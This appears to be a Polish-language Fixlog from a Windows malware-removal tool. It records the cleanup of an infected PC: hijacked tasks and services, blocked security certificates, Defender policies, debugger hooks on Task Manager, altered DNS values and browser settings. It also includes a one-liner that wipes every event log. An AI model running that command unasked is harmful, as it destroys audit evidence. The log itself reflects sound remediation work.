"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E9BDE757-84E7-4207-9089-B095B2313ECD}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E9BDE757-84E7-4207-9089-B095B2313ECD}" => pomyślnie usunięto C:\Windows\System32\Tasks\{09097A47-090F-7A0F-0B11-0E090B7D1108} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{09097A47-090F-7A0F-0B11-0E090B7D1108}" => pomyślnie usunięto C:\Users\ADMINI~1\AppData\Local\78EB64~1 => pomyślnie przeniesiono C:\Program Files\English To Chaser => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\KOMPUTER01" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => pomyślnie usunięto "HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => pomyślnie usunięto "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell" => pomyślnie usunięto "HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE" => pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe" => pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe" => pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" => pomyślnie usunięto C:\Windows\system32\GroupPolicy\Machine => pomyślnie przeniesiono C:\Windows\system32\GroupPolicy\GPT.ini => pomyślnie przeniesiono "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8EF21497-7361-4F1C-A09C-A9A671FA6743}\\NameServer" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => klucz nie znaleziono HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => pomyślnie usunięto HKLM\Software\Wow6432Node\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono "Chrome HomePage" => pomyślnie usunięto "HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => pomyślnie usunięto "HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\WinCacheSrv" => pomyślnie usunięto WinCacheSrv => serwis pomyślnie usunięto Nie można przenieść "C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp" => Zaplanowany do przeniesienia przy restarcie. "HKLM\System\CurrentControlSet\Services\CornerSunshineSvc" => pomyślnie usunięto CornerSunshineSvc => serwis pomyślnie usunięto C:\Users\Public\Documents\report.dat => pomyślnie przeniesiono C:\Users\Public\Documents\temp.dat => pomyślnie przeniesiono C:\ProgramData\fjcfi => pomyślnie przeniesiono C:\ProgramData\chuvc => pomyślnie przeniesiono C:\Users\administratorka\AppData\Local\YdozKPUZep => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Picasa 3.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\DriverDoc.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\Register DriverDoc.lnk => pomyślnie przeniesiono C:\Users\administratorka\Desktop\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox (2).lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk => Skrót - argument pomyślnie przywrócono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\theHunter\theHunter.lnk => Skrót - argument pomyślnie usunięto C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox (Safe Mode).lnk => Skrót - argument pomyślnie usunięto C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox.lnk => Skrót - argument pomyślnie usunięto ========= dir /a "C:\Program Files" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Program Files 2018-01-24 15:27 . 2018-01-24 15:27 .. 2016-07-17 21:39 AMD 2016-09-15 20:13 AVAST Software 2018-01-19 15:58 CCleaner 2017-10-24 20:01 Common Files 2009-07-14 05:54 174 desktop.ini 2011-04-12 14:32 DVD Maker 2016-07-07 20:47 GIGABYTE 2016-07-07 20:48 Intel 2016-07-09 11:49 Internet Explorer 2016-11-22 18:01 McAfee 2011-04-12 14:32 Microsoft Games 2009-07-14 06:32 MSBuild 2016-07-07 20:45 Realtek 2009-07-14 06:32 Reference Assemblies 2017-03-08 17:59 TrueKey 2009-07-14 06:09 Uninstall Information 2017-03-23 13:08 VideoLAN 2016-07-09 11:48 Windows Defender 2016-07-14 09:45 Windows Journal 2011-04-12 14:21 Windows Mail 2016-10-13 09:28 Windows Media Player 2016-07-07 19:29 Windows NT 2011-04-12 14:21 Windows Photo Viewer 2010-11-21 04:31 Windows Portable Devices 2011-04-12 14:21 Windows Sidebar 1 plik(˘w) 174 bajt˘w 26 katalog(˘w) 2˙926˙010˙368 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files (x86)" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Program Files (x86) 2018-01-24 15:25 . 2018-01-24 15:25 .. 2017-05-17 10:03 Adobe 2016-07-07 20:51 AMD 2017-09-10 11:04 BFG 2017-05-27 09:22 BiaoJi 2017-11-24 13:48 Common Files 2016-10-01 09:29 Corner Sunshine 2009-07-14 05:54 174 desktop.ini 2018-01-12 12:42 DOSBox-0.74 2017-12-11 10:48 Drakensang Online 2016-07-08 09:53 DriverDoc 2016-07-17 20:43 DriverPack Notifier 2016-07-07 20:53 GIGABYTE 2017-12-25 19:24 Google 2016-07-30 17:44 Grupa IMAGE 2017-11-24 11:51 GtkSharp 2016-09-15 20:19 InstallShield Installation Information 2016-07-07 20:52 Intel 2016-07-09 11:49 Internet Explorer 2016-07-07 21:55 Java 2016-09-15 20:12 KYE 2017-09-26 08:43 McAfee 2017-11-24 14:10 Microsoft SDKs 2017-11-24 13:22 Microsoft Visual Studio 2017-11-24 14:10 Microsoft Visual Studio Tools for Unity 2017-11-24 13:48 Microsoft.NET 2017-09-25 10:40 Movie Maker 2.6 2017-05-21 08:54 Mozilla Firefox 2017-05-21 08:54 Mozilla Maintenance Service 2017-11-24 13:48 MSBuild 2017-12-23 16:20 Opera 2016-07-09 23:53 Origin Games 2016-07-07 20:45 Realtek 2009-07-14 06:32 Reference Assemblies 2017-09-10 10:59 ReflexiveArcade 2017-03-23 13:04 ScreenShot 2017-09-05 17:23 Skype 2018-01-24 13:00 Steam 2016-07-07 21:00 SymSilent 2016-09-14 22:07 Temp 2009-07-14 05:57 Uninstall Information 2016-07-09 11:48 Windows Defender 2017-11-24 13:48 Windows Kits 2011-04-12 14:21 Windows Mail 2016-10-13 09:28 Windows Media Player 2009-07-14 06:32 Windows NT 2011-04-12 14:21 Windows Photo Viewer 2010-11-21 04:31 Windows Portable Devices 2011-04-12 14:21 Windows Sidebar 2016-07-11 10:05 WinRAR 2016-09-19 06:54 WinSaber 1 plik(˘w) 174 bajt˘w 51 katalog(˘w) 2˙926˙010˙368 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files\Common Files\System" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Program Files\Common Files\System 2016-07-09 19:50 . 2016-07-09 19:50 .. 2016-07-09 11:48 ado 2009-07-14 02:40 29˙184 DirectDB.dll 2011-04-12 14:21 en-US 2016-07-09 11:48 msadc 2016-07-09 19:50 Ole DB 2011-04-12 14:21 pl-PL 2011-10-01 06:45 886˙784 wab32.dll 2009-07-14 02:33 1˙098˙752 wab32res.dll 3 plik(˘w) 2˙014˙720 bajt˘w 7 katalog(˘w) 2˙926˙010˙368 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files (x86)\Common Files\System" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Program Files (x86)\Common Files\System 2016-07-09 19:50 . 2016-07-09 19:50 .. 2016-07-09 11:48 ado 2009-07-14 02:15 24˙064 DirectDB.dll 2011-04-12 14:21 en-US 2016-07-09 11:48 msadc 2016-07-09 19:50 Ole DB 2011-04-12 14:21 pl-PL 2011-10-01 05:37 708˙608 wab32.dll 2009-07-14 02:11 1˙098˙752 wab32res.dll 3 plik(˘w) 1˙831˙424 bajt˘w 7 katalog(˘w) 2˙926˙010˙368 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\ProgramData ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\ProgramData 2018-01-24 15:27 . 2018-01-24 15:27 .. 2018-01-24 12:38 2e89a3 2018-01-23 00:38 3fed80ce-11f1-0 2018-01-23 00:38 3fed80ce-6ab7-1 2017-05-17 10:25 Adobe 2009-07-14 06:08 Application Data [C:\ProgramData] 2016-11-22 18:01 Ashampoo 2016-09-15 20:13 AVAST Software 2016-10-21 14:12 BaofengUpdate_U 2016-09-29 10:04 corss 2016-08-21 09:32 DAEMON Tools Lite 2016-07-07 19:29 Dane aplikacji [C:\ProgramData] 2009-07-14 06:08 Desktop [C:\Users\Public\Desktop] 2009-07-14 06:08 Documents [C:\Users\Public\Documents] 2016-07-07 19:29 Dokumenty [C:\Users\Public\Documents] 2016-09-15 19:55 DriverGenius 2016-07-09 23:28 Electronic Arts 2018-01-24 15:12 f595a9da-09e7-0 2018-01-23 10:45 f595a9da-27b7-1 2018-01-23 18:36 f595a9da-4f15-0 2018-01-24 12:37 f595a9da-5873-0 2018-01-23 18:36 f595a9da-6717-1 2018-01-23 12:34 f595a9da-7567-1 2018-01-24 12:36 f595a9da-7627-1 2018-01-23 12:35 f595a9da-77e3-0 2018-01-23 00:30 f595a9da-7951-0 2009-07-14 06:08 Favorites [C:\Users\Public\Favorites] 2016-07-29 00:10 Hunter 2016-07-07 20:48 Intel 2017-09-10 11:25 InterAction studios 2017-09-26 08:43 McAfee 2016-07-07 19:29 Menu Start [C:\ProgramData\Microsoft\Windows\Start Menu] 2018-01-18 00:25 Microleaves 2017-11-24 13:09 Microsoft 2016-09-14 22:07 16 mntemp 2016-09-14 22:07 4˙927 mtbjfghn.xbe 2016-07-27 09:15 Norton 2016-07-07 20:58 NortonInstaller 2018-01-24 10:53 266 ntuser.pol 2016-07-07 21:55 Oracle 2016-10-06 22:18 Origin 2017-11-24 14:09 Package Cache 2016-07-07 19:29 Pulpit [C:\Users\Public\Desktop] 2016-09-01 22:14 Riot Games 2017-09-26 08:48 Screaming Bee 2016-08-21 09:27 sozy 2009-07-14 06:08 Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu] 2016-07-07 19:29 Szablony [C:\ProgramData\Microsoft\Windows\Templates] 2009-07-14 06:08 Templates [C:\ProgramData\Microsoft\Windows\Templates] 2016-09-29 10:04 Tencent 2016-07-07 19:29 Ulubione [C:\Users\Public\Favorites] 2017-11-25 10:37 Unity 2018-01-19 13:55 UvConverter 2018-01-24 12:59 {1C91D9F2-96D3-5334-1015-CD768A5746B8} 2018-01-23 00:29 {2b155d02-712c-1} 2018-01-23 00:29 {69ee4733-212c-0} 3 plik(˘w) 5˙209 bajt˘w 54 katalog(˘w) 2˙926˙006˙272 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\administratorka\AppData\Local ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Users\administratorka\AppData\Local 2018-01-24 15:27 . 2018-01-24 15:27 .. 2017-05-17 11:48 Adobe 2018-01-18 00:21 AdvinstAnalytics 2016-07-08 00:33 CEF 2018-01-24 10:54 CrashDumps 2016-07-30 11:20 CrashRpt 2016-07-07 19:29 Dane aplikacji [C:\Users\administratorka\AppData\Local] 2017-10-16 14:56 Diagnostics 2016-08-21 09:51 Disc_Soft_Ltd 2018-01-12 12:22 DOSBox 2018-01-24 15:21 ElevatedDiagnostics 2018-01-18 00:22 FastDataX 2016-07-10 09:28 58˙016 GDIPFONTCACHEV1.DAT 2017-03-07 19:39 GG 2017-12-25 19:24 Google 2016-07-09 20:42 GWX 2016-07-07 19:29 Historia [C:\Users\administratorka\AppData\Local\Microsoft\Windows\History] 2018-01-24 00:56 7˙741˙806 IconCache.db 2017-03-08 17:17 Macromedia 2017-11-24 14:09 Microsoft 2017-02-06 21:27 Microsoft Games 2016-09-16 14:30 Mozilla 2017-03-28 10:11 NFS Underground 2 2017-05-20 01:02 OpenFM 2016-07-17 21:00 Opera Software 2016-07-09 23:53 Origin 2016-07-08 09:52 Programs 2017-01-04 12:19 PRO_PC_Cleaner 2017-11-24 13:21 ServiceHub 2017-09-25 10:23 SkypeVoiceChanger 2016-12-12 22:49 Steam 2017-03-03 22:14 TeamSpeak 3 2018-01-24 15:27 Temp 2016-07-07 19:29 Temporary Internet Files [C:\Users\administratorka\AppData\Local\Microsoft\Windows\Temporary Internet Files] 2016-07-30 11:20 theHunter 2017-11-25 10:37 Unity 2017-09-10 10:55 VirtualStore 2017-09-25 10:44 WMTools Downloaded Files 2 plik(˘w) 7˙799˙822 bajt˘w 37 katalog(˘w) 2˙926˙002˙176 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\administratorka\AppData\LocalLow ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Users\administratorka\AppData\LocalLow 2018-01-24 10:58 . 2018-01-24 10:58 .. 2017-05-17 11:48 Adobe 2017-03-08 17:17 Microsoft 2018-01-24 13:32 Mozilla 2016-07-07 21:44 Oracle 2016-07-07 21:55 Sun 2016-07-09 09:41 Temp 2017-11-25 10:37 Unity 0 plik(˘w) 0 bajt˘w 9 katalog(˘w) 2˙926˙002˙176 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\administratorkaAppData\Roaming ========= Nie moľna odnale«† okre˜lonego pliku. ========= Koniec CMD: ========= ========= netsh advfirewall reset ========= Ok. ========= Koniec CMD: ========= ========= ipconfig /flushdns ========= Konfiguracja IP systemu Windows Pomy˜lnie opr˘ľniono pami©† podr©cznĄ programu rozpoznawania nazw DNS. ========= Koniec CMD: ========= C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono Hosts pomyślnie przywrócono. ========= wevtutil el | Foreach-Object {wevtutil cl "$_"} ========= ========= Koniec Powershell: ========= =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 125390409 B Java, Flash, Steam htmlcache => 264063647 B Windows/system/drivers => 697152240 B Edge => 0 B Chrome => 325982 B Firefox => 311799294 B Opera => 224398850 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 66228 B Public => 0 B ProgramData => 0 B systemprofile => 58858282 B systemprofile32 => 66660 B LocalService => 66295 B NetworkService => 186560 B administratorka => 3061237205 B RecycleBin => 0 B EmptyTemp: => 4.4 GB danych tymczasowych Usunięto. ================================ Rezultat przenoszenia plików przy restarcie (Tryb startu: Normal) (Data i godzina: 24-01-2018 15:32:33) C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp => Nie można przenieść ==== Koniec Fixlog 15:32:33 ====